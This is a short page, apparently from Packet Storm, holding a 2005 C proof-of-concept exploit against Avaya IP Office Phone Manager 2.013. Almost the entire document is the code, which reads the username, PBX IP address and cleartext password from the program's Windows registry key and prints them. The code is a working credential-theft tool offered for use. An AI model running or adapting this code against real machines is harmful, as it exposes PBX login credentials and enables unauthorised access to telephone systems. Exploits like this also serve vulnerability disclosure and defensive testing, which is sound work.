Avaya IP Office Phone Manager exploit that attempts to extract sensitive data from the Windows registry.
ff0a4079c402c4cf0790dcb6c7d725ce9160fd962b77a2c52670e8f2f6179804#include <windows.h>
#include <stdio.h>
#include <string.h>
/*
Filename: exploit.c
Title: Avaya IP Office Phone Manager - Cleartext Sensitive Data Vulnerability
Exploit v0.01
Author: pagvac (Adrian Pastor)
Date: 24th Feb, 2005
Other info: tested on version 2.013. Compile as a Win32 console application
project in Visual C++
*/
BOOL QueryVal(char lszVal2Query[255], char lszValData[255])
{
char lszResult[255];
HKEY hKey;
LONG returnStatus;
DWORD dwType=REG_SZ;
DWORD dwSize=255;
returnStatus = RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\AVAYA\\IP400\\GENERIC", 0L, KEY_READ, &hKey);
if (returnStatus == ERROR_SUCCESS)
{
returnStatus = RegQueryValueEx(hKey, lszVal2Query, NULL, &dwType,(LPBYTE)&lszResult, &dwSize);
if (returnStatus == ERROR_SUCCESS)
{
strcpy(lszValData, lszResult);
}
RegCloseKey(hKey);
return TRUE;
}
else
{
RegCloseKey(hKey);
return FALSE;
}
}
void main()
{
char valData[255];
printf("\nAvaya IP Office Phone Manager - Cleartext Sensitive Data Vulnerability Exploit\n");
printf("By pagvac (Adrian Pastor)\n");
printf("Tested on version 2.013\n\n");
// Print username
printf("Username:\t");
if(!QueryVal("UserName", valData))
printf("Error! No permissions to read key value?\n");
else
printf("%s\n", valData);
// Print IP address
printf("PBX IP Address:\t");
if(!QueryVal("PBXAddress", valData))
printf("Error! No permissions to read key value?\n");
else
printf("%s\n", valData);
// Print password
printf("Password:\t");
if(!QueryVal("Password", valData))
printf("Error! No permissions to read key value?\n");
else
{
if(strcmp(valData, "")==0)
printf("[blank password]\n\n");
else
{
printf("%s\n", valData);
printf("Password obsfucated?\n\n");
}
}
}
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed